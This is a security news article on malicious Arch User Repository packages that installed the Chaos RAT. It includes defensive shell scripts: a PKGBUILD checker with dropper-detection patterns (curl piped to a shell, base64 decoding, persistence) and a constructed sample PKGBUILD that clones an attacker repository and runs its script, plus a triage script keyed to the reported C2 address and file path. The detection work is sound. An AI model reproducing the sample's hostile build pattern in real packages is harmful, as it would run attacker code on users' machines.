Chaos RAT Infiltrates Arch Linux via Malicious AUR Packages
Chaos RAT Exploits Arch Linux AUR in Supply Chain Attack
Malicious packages uploaded to the Arch User Repository (AUR) installed the Chaos RAT on the systems of users who built them. Community members and maintainers identified and removed the packages within about 48 hours, but the incident shows the persistent risk of a distribution model in which anyone can publish a build script that other users run.
The Attack Unfolded
On July 16, a user identified as "danikpapas" submitted three packages to the AUR:
- librewolf-fix-bin
- firefox-patch-bin
- zen-browser-patched-bin
The packages were presented as patched or optimized browser builds. Each PKGBUILD listed a GitHub repository controlled by the attacker (https://github.com/danikpapas/zenbrowser-patch.git) as a source, so makepkg cloned it during the build and ran a script from it. Anyone who built one of these packages with makepkg or an AUR helper without reading the PKGBUILD and the fetched source executed attacker-controlled code, and because the source was a live repository rather than a checksummed archive, its contents could be changed at any time after the package was published.
"These packages were installing a script coming from the same GitHub repository that was identified as a Remote Access Trojan (RAT)," warned the Arch Linux maintainers in their alert. "We strongly encourage users that may have installed one of these packages to remove them and ensure they were not compromised."
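The check below is an added example, not Arch's or the AUR's own tooling. It reads a PKGBUILD on stdin and flags the patterns this attack relied on: a VCS source fetched at build time, a "-bin" package that nevertheless clones a repository, and a few other signs worth a second look before running makepkg. The two PKGBUILDs it scans are constructed samples modelled on the description above; the real PKGBUILDs were removed with the packages and are not reproduced here, and the script name and checksum in the samples are placeholders.

```shell
#!/bin/sh
# Added example: a pre-makepkg PKGBUILD check. Reads a PKGBUILD on stdin,
# prints one finding per line and exits 1 if anything was flagged.
# Not the AUR's or the Arch maintainers' tooling.

inspect_pkgbuild() {
    awk '
    function flag(msg) { printf "line %d: %s: %s\n", NR, msg, $0; hits++ }

    # Work on a copy with trailing comments removed so that a remark such as
    # "# do not use git+https here" does not trigger a finding.
    { line = $0; sub(/#.*/, "", line) }

    # Remember the package name so the END block can reason about it.
    /^pkgname=/ { pkgname = $0; sub(/^pkgname=/, "", pkgname); gsub(/[^A-Za-z0-9._+-]/, "", pkgname) }

    # A repository cloned at build time means the code that runs is whatever
    # the repository owner has pushed since the package was last looked at.
    line ~ /git\+(https?|ssh|git):\/\// { vcs = 1; flag("VCS source fetched at build time") }

    # An .install script runs as root inside pacman on every install/upgrade.
    line ~ /^[ \t]*install=/ { flag("install hook runs as root during pacman transactions") }

    # Classic droppers: pipe a download into a shell, or decode an embedded blob.
    line ~ /(curl|wget)[^|]*[|][ \t]*(ba)?sh/ { flag("pipes downloaded content into a shell") }
    line ~ /base64[ \t]+(-d|--decode)/ { flag("decodes an embedded blob") }

    # Writing to or executing from /tmp is how the reported RAT was dropped.
    line ~ /\/tmp\/[A-Za-z0-9._-]+/ { flag("writes to or runs from /tmp") }

    # Anything meant to outlive the build is a persistence attempt.
    line ~ /(nohup|setsid|systemctl[ \t]+(--user[ \t]+)?enable|crontab)/ { flag("sets up persistence") }

    END {
        if (pkgname ~ /-bin$/ && vcs) {
            printf "summary: %s claims to be a binary package but clones a repository at build time\n", pkgname
            hits++
        }
        exit (hits > 0)
    }'
}

# Constructed sample modelled on the article: a "-bin" package whose only
# source is the attacker's repository and whose package() step runs a script
# from it. The script name is a placeholder; this is not the real PKGBUILD.
sample_malicious_pkgbuild() {
    cat <<'EOF'
pkgname=zen-browser-patched-bin
pkgver=1.0
pkgrel=1
pkgdesc="Zen browser with performance patches"
arch=('x86_64')
source=("git+https://github.com/danikpapas/zenbrowser-patch.git")
sha256sums=('SKIP')

package() {
    cd "$srcdir/zenbrowser-patch"
    sh ./setup.sh
}
EOF
}

# Constructed benign counterpart: a versioned tarball with a pinned checksum
# (placeholder value) and a package() that only copies files into $pkgdir.
sample_clean_pkgbuild() {
    cat <<'EOF'
pkgname=example-bin
pkgver=2.3.1
pkgrel=1
pkgdesc="Example binary package (constructed sample)"
arch=('x86_64')
url="https://example.org"
source=("https://example.org/releases/example-${pkgver}-x86_64.tar.gz")
sha256sums=('e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855')

package() {
    install -Dm755 "$srcdir/example" "$pkgdir/usr/bin/example"
}
EOF
}

# Usage in a package directory, before makepkg:  inspect_pkgbuild < PKGBUILD
# Run this file with --demo to see both constructed samples scored.
if [ "${1:-}" = "--demo" ]; then
    sample_malicious_pkgbuild | inspect_pkgbuild || echo "malicious sample: flagged"
    sample_clean_pkgbuild | inspect_pkgbuild && echo "clean sample: no findings"
fi
```

A non-zero exit is a reason to read the whole PKGBUILD and the fetched source, not proof of malice: plenty of legitimate -git packages clone repositories, but a package that advertises itself as a prebuilt binary and still does so is exactly the combination seen here.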
Inside the Chaos RAT Threat
The malware, identified as Chaos RAT, is an open-source tool capable of:
- Executing arbitrary commands
- Uploading/downloading files
- Establishing reverse shells
- Harvesting credentials
Infected systems beaconed to a command-and-control (C2) server at 130.162.225.47:8080, giving the operator remote access for as long as the implant ran. Chaos RAT has been used in cryptomining and espionage campaigns; once it is running, the compromised host executes whatever the operator sends.
Detection starts with a process running from a rogue executable whose name imitates systemd:
/tmp/systemd-initd
Affected users should kill this process, delete the file, and remove the packages. That is only containment: a RAT that runs arbitrary commands and uploads files may already have taken SSH keys, browser sessions, or other credentials from the host, so anything stored there should be treated as exposed, and a clean reinstall is the safest course.
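Added example, not the maintainers' tooling: a triage script that checks a host for the indicators reported in this incident (the three package names, the C2 endpoint and the dropped binary). The parsing functions read pacman, ss and ps output on stdin so they can be exercised against captured text; triage runs them against the live system and also walks /proc, which catches an implant that is still running after its file in /tmp has been deleted.

```shell
#!/bin/sh
# Added example: host triage for the indicators reported in this incident.
# The package names, the C2 address and the dropped path come from the
# article; the parsing functions are mine, not the Arch maintainers' tooling.

PKGS="librewolf-fix-bin firefox-patch-bin zen-browser-patched-bin"
C2_RE='130\.162\.225\.47:8080'      # regex form of 130.162.225.47:8080
RAT_PATH=/tmp/systemd-initd

# check_packages: read `pacman -Q` output on stdin and print any of the three
# package names that are installed. Exit 1 when none are present.
check_packages() {
    awk -v pkgs="$PKGS" '
        BEGIN { n = split(pkgs, a, " "); for (i = 1; i <= n; i++) want[a[i]] = 1 }
        ($1 in want) { print $1; found = 1 }
        END { exit !found }'
}

# check_connections: read `ss -ntp` (or `netstat -ntp`) output on stdin and
# print sockets whose peer is the reported C2. Exit 1 when there are none.
check_connections() {
    grep -E "[[:space:]]${C2_RE}([[:space:]]|$)"
}

# check_process: read `ps -eo pid,args` output on stdin and print processes
# started from the dropped binary, by full path or by bare name.
# systemd ships no binary called systemd-initd; the name is camouflage.
check_process() {
    grep -E "(^|[[:space:]/])systemd-initd([[:space:]]|$)"
}

# triage: run every check against the live system and exit 1 if any
# indicator is present. The /proc walk finds a running implant whose file
# has already been deleted (readlink then ends in " (deleted)").
triage() {
    rc=0
    pacman -Q 2>/dev/null | check_packages && rc=1
    ss -ntp 2>/dev/null | check_connections && rc=1
    ps -eo pid,args 2>/dev/null | check_process && rc=1
    [ -e "$RAT_PATH" ] && { echo "file present: $RAT_PATH"; rc=1; }
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        case "$exe" in
            "$RAT_PATH"*) echo "pid ${p#/proc/} exe -> $exe"; rc=1 ;;
        esac
    done
    return "$rc"
}

# Touch the live host only when invoked with --run, so the functions can be
# sourced and tried against captured output first.
if [ "${1:-}" = "--run" ]; then
    triage && echo "no indicators found"
fi
```

Run it as root (`sh triage.sh --run`) so that ss can attribute sockets to processes and /proc/*/exe is readable for every pid. A clean result only means these specific indicators are absent; the C2 address and binary path are trivially changed by the operator, so the package check and a review of what the PKGBUILD actually fetched remain the authoritative test.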
Community Vigilance and Systemic Flaws
The attack came to light when a Reddit account, probably itself compromised, promoted the packages and drew suspicion. One user uploaded a sample to VirusTotal, where it was flagged as Chaos RAT. This rapid crowd-sourced response contrasts with the AUR's structural weakness: unlike the official repositories, whose packages are built and signed by Arch packagers, the AUR hosts user-submitted build scripts with no automated review, so the burden of checking them falls entirely on the person running makepkg.
This incident fits the rising pattern of supply chain attacks in which trusted open-source channels are used to distribute malware. Because anyone can upload an unreviewed PKGBUILD, the AUR is an attractive target, much as npm and PyPI have repeatedly been.
Implications for Open Source Security
Arch Linux acted swiftly and removed the packages on July 18, but the breach underscores an industry-wide problem: community repositories run on trust and have few safeguards against malicious contributors. Users should read every PKGBUILD, along with any .install script and any source it fetches, before building, whether by hand, with tools such as pacreview, or through the review prompt of an AUR helper, and should be suspicious of a package that claims to ship a binary yet clones a repository. For maintainers, the event may accelerate demands for basic automated scanning or reputation systems to prevent a recurrence.
As open-source ecosystems grow, the lesson is plain: convenience in software distribution must not come at the cost of security. The next malicious package may not be caught so quickly, and both users and platforms need to harden their defenses in an era where one malicious commit can cascade into widespread compromise.
Source: BleepingComputer